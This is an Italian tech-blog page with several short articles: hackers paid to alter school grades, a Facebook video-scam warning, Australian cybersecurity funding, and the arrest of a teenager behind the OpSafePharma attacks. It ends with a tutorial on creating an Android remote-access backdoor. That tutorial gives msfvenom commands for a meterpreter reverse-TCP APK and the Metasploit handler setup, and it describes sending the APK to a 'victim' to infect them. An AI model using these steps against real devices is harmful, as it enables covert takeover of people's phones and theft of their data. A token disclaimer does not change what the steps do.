Articoli

Hacker a pagamento per cambiare voti scolastici

La tecnologia nelle scuole si è diffusa velocemente tra computer nuovi di zecca a registri elettronici. Sorgono però anche aspetti negativi. Gli hacker a pagamento di alte somme, possono entrare semplicemente nel sistema. Negli USA basta pagare più o meno 600 dollari per poter cambiare un voto oppure farsi togliere un’assenza senza nessun problema.

Ed ovviamente i pirati informatici non si son fatti sfuggire questa opportunità per racimolare qualcosina in tasca propria, mostrando le proprie doti nel trovare falle nella sicurezza della Scuola. Basti pensare che negli USA non vengono più utilizzate le prove cartacee. Esami, compiti ed appunti vengono tutti svolti con i computer.




Cosa cambia da ieri ad oggi?

Deep-Web-Iceberg-e1432663755280Si ricorre a tutto pur di beffare la scuola. Fin da quando non esistevano i computer nell’ambito scolastico, l’alunno si ingegnava in ogni modo pur di evitare o barare il compito del giorno dopo. Veniva fatto tutto in prima persona, prendendo la responsabilità se si veniva beccati nella truffa. Oggi, invece, non serve neanche sporcarsi le mani. Basta fare due click su internet, più precisamente nella parte nascosta di essa, il Dark web, ed è subito possibile trafficare con il pirata informatico.

Quale sarebbe il lavoro dell’hacker a pagamento?

Sappiamo che questo è un metodo illegale. Se il pirata informatico viene scoperto, saprà già di andare incontro ad una condanna. Quindi i prezzi sono veramente alti in base a quello che lo studente richiede. Il traffico verrà eseguito su internet dove viene utilizzato il Bitcoin come moneta.

Il bitcoinbitcoin è la moneta più diffusa nel web ed equivale a circa 600 dollari (variante). Con un bitcoin quindi è possibile fare le cose più semplici come farsi togliere un’assenza o farsi alzare un voto. Con un prezzo maggiore è possibile però far saltare l’intera rete informatica della scuola, causando il rinvio delle prove o il blocco totale del sistema scolastico.

In Italia abbiamo qualche rischio?hacker a pagamento

L’Italia sta diventando sempre più vulnerabile a questi attacchi. Perché? In Italia da pochi anni l’informatica è entrata a far parte completamente dell’ambito scolastico. Il problema sorge nell’apprendere rapidamente l’impiego dei macchinari che vengono installati. Gli studenti tuttora affermano di utilizzare ancora registri cartacei, seppur abbiamo la possibilità di usare quello elettronico. Questo è dovuto al fatto che i docenti non sono ancora entrati pienamente nel contesto. Tutto questo si tramuta in uno scarso utilizzo da parte degli insegnanti che lasciano fare gli studenti, i quali possono liberamente modificare voti o assenze senza che loro se ne accorgano. Senza contare il fatto che i docenti che intendono utilizzare il registro elettronico, inseriscono le proprie credenziali davanti agli occhi degli studenti, incorrendo nel classico fenomeno di phishing (password rubata).

Se si comprende questo pericolo, si può certo capire dove potrebbe arrivare tutto ciò se le infiltrazioni degli hacker a pagamento dovessero arrivare in Italia.

Virus Facebook: “Sei stato menzionato in un commento”

Un periodo che vede vacillare molto la sicurezza di noi poveri utenti. Grazie ad alcune fonti e allo stesso social network, si è stati informati su un nuovo Virus Facebook. Ecco come identificarlo ed evitarlo.

“Sei stato menzionato in un commento” – Ecco come il Virus Facebook si propaga a macchia d’olio

In questi ultimi tempi vi è una vera minaccia per i nostri dati sensibili. Ad iniziare dal classico virus su Whatsapp, dove si promettono 150€ dal noto marchio Zara, adesso bisogna prestare attenzione anche ad uno dei più grandi social network del mondo.

Oramai condividiamo qualsiasi momento sul nostro profilo. Siamo diventati la cosiddetta generazione social. Grazie a questa piattaforma tanto criticata, molte star non sarebbero neanche riuscite a farsi notare. Ma se vi dicessimo che esistono alcuni virus Facebook sotto forma di video?

Catene di Sant’Antonio alla moda e più social

virus facebookGià da un po’ il social network tutto blu sta avendo un grande successo per la riproduzione di video sulla sua piattaforma, ma occhio a cosa cliccate.
Molti di questi filmati ingannano la vittima, mostrando nelle loro anteprime immagine curiose o di tipo pornografico. Ovviamente non vedrete assolutamente nulla, anzi, sarete diventate vittime di Hijacking.

Quindi, come evitare di essere vittima di questo tipo di attacco? La risposta è abbastanza scontata e noiosa, ma di cui non ci stancheremo mai di ripetervi.
Attenti a qualsiasi link voi clicchiate. Molti di questi riescono ad auto-autorizzarsi e quindi, non solo riusciranno ad impossessarsi di dati personali, ma potranno diffondere post con il vostro nome.

Noi di Tebigeek vi consigliamo inoltre di segnalare il problema, in modo da avvertire più gente possibile.
Vi consiglio di seguire alcune pagine per rimanere informati sulle future minacce:

Le seguenti pagine sono state create dalla polizia di stato. Formate da alcuni agenti che operano nel garantire maggiore sicurezza sul web.

Cyber Sicurezza australiana: fortificate le difese

Oltre 230 milioni di dollari (equivalenti a 160 milioni di euro) spesi dal sistema australiano per impedire al paese che esso venga colpito nuovamente. L’incremento di misure riguardante la Cyber sicurezza australiana, sono state rese obbligate per evitare altri spiacevoli inconvenienti. L’evento si è tenuto a Sydney durante il Cyber Security Strategy.

La novità annunciata da Turnbull per il miglioramento della Cyber sicurezza australiana

Il ruolo della sicurezza è importante al giorcyber sicurezza australianano d’oggi” dichiara il primo ministro australiano. Oramai l’economia mondiale gira attorno alla tecnologia. Una verità che nessuno può negare al giorno d’oggi. Il rafforzamento di queste tecnologia, crede il ministro, che gioverà l’intera economia nazionale. Il crimine informatico sembra riportare all’australia danni pari a 1 miliardo di dollari annui.

Gli interventi, sul piano della Cyber sicurezza australiana, dovranno essere terminati entro quattro anni di attività. Le opere inizieranno su infrastrutture che richiedono urgente manutenzione, fino ad arrivare a strutture pubbliche e private. Inoltre si stanno stanziando finanziamenti di 47 milioni di dollari per istituire centri di informazione sulla criminalità informatica. L’istituzione di questo centro incrementerà di molto le conoscenze in questo campo, aumentandone le misure difensive da parte del sistema australiano.

La strategia che prevede un’orda di assunzioni per il miglioramento delle difese

Da quanto dichiarato da Turnbull, l’investimento completo riguarda anche l’assunzione di 800 specialisti sulla sicurezza informatica. Una buona notizia che potrebbe mettere in moto in una maniera più che accentuata l’economia.

Una bella promessa quella dell’Australia. L’Italia dovrebbe prendere spunto da altre nazioni, in quanto la nostra sicurezza viene minacciata giornalmente. Migliorando i nostri sistemi non solo garantiamo maggiore privacy, ma un’ingente quantità di assunzioni per un mercato sempre in via di sviluppo che permetta di trovare nuove misure di difesa e attacco.

Concludo citando senza opportune traduzioni una frase di assoluta rilevanza del primo ministro australiano: Collaboration is absolutely key.

Fonte | TheRegister

Opsafepharma: Arrestato hacker 16enne

Udine – Polizia postale arresta il responsabile della campagna Opsafepharma

Arrestato giovane di 16 anni nella provincia di UdineArtek, così si faceva chiamare all’interno nei meandri del web. La campagna diramata il 16 di Marzo (Opsafepharma) che aveva come obiettivi principali numerosi istituti italiani, i quali adoperano all’interno della sanità, è stata placata dalla polizia postale.anonymous opsafepharma

Tra gli istituti colpiti all’interno del suolo italiano abbiamo:

  • L’istituto superiore della sanità,
  • Il Ministero della Salute
  • Le aziende sanitarie locali (ASL) di numerose Regioni

Il movente, ovvero la lenta prassi della Sanità italiana in materia di “Disturbo da deficit di attenzione/iperattività“, ha coinvolto nella protesta numerosi partecipanti.

Opsafepharma: Ecco cosa è successo

Attenzione: Tebigeek non vuole dire cosa sia giusto o sbagliato. Le riflessioni presenti, anche se di piccola dimensione, non hanno lo scopo di influenzare i vostri ideali.

L’operazione OpSafePharma nelle ultime ore sta avendo un solo nome: Artek. Egli è riuscito a penetrare e ad abbattere molti degli istituti sanitari presenti nel suolo italiano.

Gli attacchi effettuati sono di diversa natura, a partire dal DDoS. Acronimo di “Denial Of Service“, in questo campo è  solitamente un attacco volontario che ha lo scopo di esaurire tutte le risorse, come ad esempio su un web server.
Questo tipo di azione ha permesso di rendere non usabili i vari servizi forniti dallo stato, causando ovviamente disagio.

L’altro tipo di offensiva accennata dalle forze dell’ordine è la SQL Injection. Questo tipo di attacco, viene impiegato su applicazioni che fanno utilizzo di un DBMS SQL.
Permette di inserire all’interno di un’interrogazione al server costruita male, del codice maligno, dove il programmatore riesce ad entrare all’interno di aree riservate.
Quindi questo ha permesso al ragazzo di recuperare dati sensibili, i quali sono stati anche pubblicati.

Dove sono finiti i dati?

La polizia ha prontamente perquisito la casa del ragazzo, keyboard opsafepharmasequestrandogli tutto il materiale informatico incriminato e mettendolo in mano agli investigatori, in quanto i dati contenuti sono criptati.

Come creare una BackDoor per Android con Linux

Come creare una BackDoor
per Android con Linux

Oggi andremo a vedere come creare una BackDoor per Android con Linux in pochi e semplici passi.

Come creare una BackDoor per Android con LinuxMolte persone per controllare un dispositivo Android da remoto usa il noto Tool “AndroRat”. Ma siccome a noi di Tebigeek non piace la la “Pappa pronta” andremo a vedere come crearci il nostro RAT con qualsiasi distribuzione Linux!

Questa guida ricordiamo che è solo a scopo illustrativo per testare i vostri dispositivi e non per infettare altri. Tebigeek non si assume nessuna responsabilità dell’uso che ne farete.

Requisiti:

Una distribuzione Linux (BackBox, Kali, Parrot ecc…)
Framework Metasploit (Già presente nelle distribuzioni Linux dedicate ai Pen Test, come Kali Linux)
Un dispositivo Android

In questa guida userò BackBox.

Step 1: Creare il Payload!

Apriamo il terminale su BackBox
Utilizziamo Metasploit per creare l’exploit

msfvenom -p  android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1604 R >
 /home/the_boss_/Scrivania/Hack.apk

Screen 1

Una volta eseguito il comando avremo un file Hack.apk da inviare alla vittima per infettarla.

Step 2: Impostazioni Connessione

Adesso bisogna predisporre la nostra macchina ad una connessione di tipo reverse_tcp con questi comandi:

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

A questo punto inseriamo i parametri associati al nostro scenario, con questi comandi in fila:

set lhost 192.168.1.6 –> Indirizzo IP dell'attaccante
set lport 1604 –> porta su cui ascoltare per connessione in entrata (assicurarsi
che la porta sia aperta)
exploit –> Avviamo l'ascolto in attesa di connessioni in entrata

Screen 2

 

 

 

 

Quando installeremo l’APK sul dispositivo nel terminale vedremo la connessione in ascolto.

 

Arrivati a questo punto siete riusciti ad infettare la vostra vittima, vi consiglio di provare solo in locale su dispositivi di vostra proprietà per evitare eventuali problemi, anche perchè io e Tebigeek non ci assumiamo nessuna responsabilità come vi ho già detto all’inizio.